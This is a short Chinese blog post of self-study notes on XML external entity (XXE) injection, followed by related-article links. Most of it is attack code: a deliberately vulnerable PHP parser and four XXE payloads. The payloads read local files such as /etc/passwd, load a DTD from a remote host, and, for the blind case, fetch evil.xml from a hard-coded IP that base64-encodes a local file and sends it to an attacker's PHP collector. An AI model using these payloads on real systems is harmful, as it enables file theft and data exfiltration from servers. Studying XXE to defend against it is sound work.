xml实体注入学习
2018-03-18 17:21
141 查看
好久没学习技术了 很多东西都忘了 复习一下
测试代码
第一种方法
第二种方法
第三种方法
测试代码
<?php $xml = file_get_contents("php://input"); $data = simplexml_load_string($xml); foreach ($data as $key => $value){ echo "you " . $key . "is " . $value . "<br>"; } ?>
第一种方法
<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE a [ <!ENTITY b SYSTEM "file:///D:/123.txt"> ]> <user> <test>&b;</test> </user>
第二种方法
<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE a [ <!ENTITY % d SYSTEM "http://host/test.dtd"> %d; ]> <user> <test>&b;</test> </user> test.dtd内容是 <!ENTITY b SYSTEM "file:///etc/passwd">
第三种方法
<!DOCTYPE a SYSTEM " http://host/test.dtd">[/code]
第四种 无回显的情况 提交
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE try[
<!ENTITY % int SYSTEM "http://123.206.229.100:8888//evil.xml">
%int;
%all;
%send;
]>服务器1.php文件<?php file_put_contents("1.txt",$_GET['file']); ?>
服务器evil.xml文件<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/123.txt"> <!ENTITY % all "<!ENTITY % send SYSTEM 'http://xxx.xxx.xxx/1.php?file=%file;'>">
相关文章推荐
- Spring 3.0 学习-DI 依赖注入_创建Spring 配置-使用一个或多个XML 文件作为配置文件,使用自动注入(byName),在代码中使用注解代替自动注入,使用自动扫描代替xml中bea
- 看好你的门-攻击服务端(2)-注入XML实体 窃取本地数据库配置
- XML实体注入漏洞
- xml多种方法注入java(学习记录)
- Xml实体注入漏洞的一些测试和总结
- Web Hacking 101 中文版 十四、XML 外部实体注入(一)
- Spring学习:注入方法和bean的Scope(xml)
- [XML学习笔记]003 实体的使用,使用XML做小型数据库
- [XML]学习笔记(二)——DTD的声明与实体
- 学习笔记 UpdateXml() MYSQL显错注入
- 通过JAXB看XML外部实体注入(XML External Entity)
- spring 学习之四(spring的注入方式(xml和annotation))
- Spring 学习笔记(四)—— XML配置依赖注入
- XML实体注入
- 黑马程序员之C#学习笔记: XML和实体序列化和反序列化
- XML外部实体注入(XXE)
- Web Hacking 101 中文版 十四、XML 外部实体注入(二)
- 传智播客 Spring学习 xml配置依赖注入
- 【Spring学习05】四种xml配置注入方式
- XXE攻防——XML外部实体注入